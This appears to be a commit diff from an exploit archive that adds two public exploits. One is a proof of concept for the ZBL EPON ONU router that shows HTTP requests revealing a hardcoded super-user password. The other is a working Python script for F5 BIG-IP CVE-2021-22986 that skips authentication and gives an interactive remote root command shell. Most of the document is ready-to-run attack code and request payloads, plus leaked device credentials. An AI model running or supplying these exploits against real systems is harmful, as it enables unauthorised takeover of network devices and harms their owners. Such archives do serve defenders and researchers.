DB: 2021-04-03
2 changes to exploits/shellcodes ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
This commit is contained in:
parent
356d0ac56b
commit
cbe5b3f2e5
3 changed files with 176 additions and 0 deletions
82
exploits/hardware/webapps/49737.txt
Normal file
82
exploits/hardware/webapps/49737.txt
Normal file
|
@ -0,0 +1,82 @@
|
||||||
|
# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
|
||||||
|
# Date: 31.01.2021
|
||||||
|
# Exploit Author: LiquidWorm
|
||||||
|
# Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com
|
||||||
|
|
||||||
|
Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
|
||||||
|
Product web page: http://www.zblchina.com | http://www.wd-thailand.com
|
||||||
|
Affected version: Firmwre: V100R001
|
||||||
|
Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
|
||||||
|
EONU Hardware Version V3.0
|
||||||
|
Software: V2.46.02P6T5S
|
||||||
|
Main Chip: RTL9607
|
||||||
|
Master Controller, Copyright (c) R&D
|
||||||
|
|
||||||
|
Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband
|
||||||
|
router.
|
||||||
|
|
||||||
|
Desc: The application suffers from a privilege escalation
|
||||||
|
vulnerability. The limited administrative user (admin:admin)
|
||||||
|
can elevate his/her privileges by sending a HTTP GET request
|
||||||
|
to the configuration backup endpoint or the password page
|
||||||
|
and disclose the http super user password. Once authenticated
|
||||||
|
as super, an attacker will be granted access to additional and
|
||||||
|
privileged functionalities.
|
||||||
|
|
||||||
|
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2021-5467
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php
|
||||||
|
|
||||||
|
|
||||||
|
31.01.2021
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
Get config file and disclose super pwd:
|
||||||
|
---------------------------------------
|
||||||
|
|
||||||
|
POST /HG104B-ZG-E.config HTTP/1.1
|
||||||
|
Host: 192.168.1.1
|
||||||
|
Connection: keep-alive
|
||||||
|
Content-Length: 42
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: https://192.168.1.1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Referer: https://192.168.1.1/system_configure.asp
|
||||||
|
Accept-Encoding: gzip, deflate, br
|
||||||
|
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
|
||||||
|
|
||||||
|
CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=
|
||||||
|
|
||||||
|
|
||||||
|
...
|
||||||
|
#web_1
|
||||||
|
user_web_name=super
|
||||||
|
user_web_password=www168nettv
|
||||||
|
...
|
||||||
|
|
||||||
|
|
||||||
|
Disclose super pwd from system pwd page:
|
||||||
|
----------------------------------------
|
||||||
|
|
||||||
|
GET /system_password.asp
|
||||||
|
Host: 192.168.1.1
|
||||||
|
|
||||||
|
...
|
||||||
|
var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2');
|
||||||
|
var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin');
|
||||||
|
...
|
92
exploits/hardware/webapps/49738.py
Executable file
92
exploits/hardware/webapps/49738.py
Executable file
|
@ -0,0 +1,92 @@
|
||||||
|
# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
|
||||||
|
# Exploit Author: Al1ex
|
||||||
|
# Vendor Homepage: https://www.f5.com/products/big-ip-services
|
||||||
|
# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2
|
||||||
|
# CVE : CVE-2021-22986
|
||||||
|
|
||||||
|
import requests
|
||||||
|
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||||
|
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
def title():
|
||||||
|
print('''
|
||||||
|
______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __
|
||||||
|
/ |\ \ / / | ____| |__ \ / _ \ |__ \ /_ | |__ \ |__ \ / _ \ / _ \ / /
|
||||||
|
| ,----' \ \/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_
|
||||||
|
| | \ / | __| |______/ / | | | | / / | | |______/ / / / \__, | > _ < | '_ \
|
||||||
|
| `----. \ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) |
|
||||||
|
\______| \__/ |_______| |____| \___/ |____| |_| |____| |____| /_/ \___/ \___/
|
||||||
|
|
||||||
|
Author:Al1ex@Heptagram
|
||||||
|
Github:https://github.com/Al1ex
|
||||||
|
''')
|
||||||
|
|
||||||
|
def exploit(url):
|
||||||
|
target_url = url + '/mgmt/shared/authn/login'
|
||||||
|
data = {
|
||||||
|
"bigipAuthCookie":"",
|
||||||
|
"username":"admin",
|
||||||
|
"loginReference":{"link":"/shared/gossip"},
|
||||||
|
"userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"}
|
||||||
|
}
|
||||||
|
headers = {
|
||||||
|
"User-Agent": "hello-world",
|
||||||
|
"Content-Type":"application/x-www-form-urlencoded"
|
||||||
|
}
|
||||||
|
response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)
|
||||||
|
if "/mgmt/shared/authz/tokens/" not in response.text:
|
||||||
|
print('(-) Get token fail !!!')
|
||||||
|
print('(*) Tested Method 2:')
|
||||||
|
header_2 = {
|
||||||
|
'User-Agent': 'hello-world',
|
||||||
|
'Content-Type': 'application/json',
|
||||||
|
'X-F5-Auth-Token': '',
|
||||||
|
'Authorization': 'Basic YWRtaW46QVNhc1M='
|
||||||
|
}
|
||||||
|
data_2 = {
|
||||||
|
"command": "run",
|
||||||
|
"utilCmdArgs": "-c whoami"
|
||||||
|
}
|
||||||
|
check_url = url + '/mgmt/tm/util/bash'
|
||||||
|
try:
|
||||||
|
response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)
|
||||||
|
if response2.status_code == 200 and 'commandResult' in response2.text:
|
||||||
|
while True:
|
||||||
|
cmd = input("(:CMD)> ")
|
||||||
|
data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)}
|
||||||
|
r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)
|
||||||
|
if r.status_code == 200 and 'commandResult' in r.text:
|
||||||
|
print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
|
||||||
|
else:
|
||||||
|
print('(-) Not vuln...')
|
||||||
|
exit(0)
|
||||||
|
except Exception:
|
||||||
|
print('ERROR Connect')
|
||||||
|
print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]))
|
||||||
|
while True:
|
||||||
|
cmd = input("(:CMD)> ")
|
||||||
|
headers = {
|
||||||
|
"Content-Type": "application/json",
|
||||||
|
"X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])
|
||||||
|
}
|
||||||
|
data_json = {
|
||||||
|
"command": "run",
|
||||||
|
"utilCmdArgs": "-c \'%s\'"%(cmd)
|
||||||
|
}
|
||||||
|
exp_url= url + '/mgmt/tm/util/bash'
|
||||||
|
exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)
|
||||||
|
if exp_req.status_code == 200 and 'commandResult' in exp_req.text:
|
||||||
|
print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
|
||||||
|
else:
|
||||||
|
print('(-) Not vuln...')
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
title()
|
||||||
|
if(len(sys.argv) < 2):
|
||||||
|
print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0]))
|
||||||
|
exit(0)
|
||||||
|
else:
|
||||||
|
exploit(sys.argv[1])
|
|
@ -43914,3 +43914,5 @@ id,file,description,date,author,type,platform,port
|
||||||
49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows,
|
49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows,
|
||||||
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,
|
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,
|
||||||
49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux,
|
49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux,
|
||||||
|
49737,exploits/hardware/webapps/49737.txt,"ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation",2021-04-02,LiquidWorm,webapps,hardware,
|
||||||
|
49738,exploits/hardware/webapps/49738.py,"F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)",2021-04-02,Al1ex,webapps,hardware,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue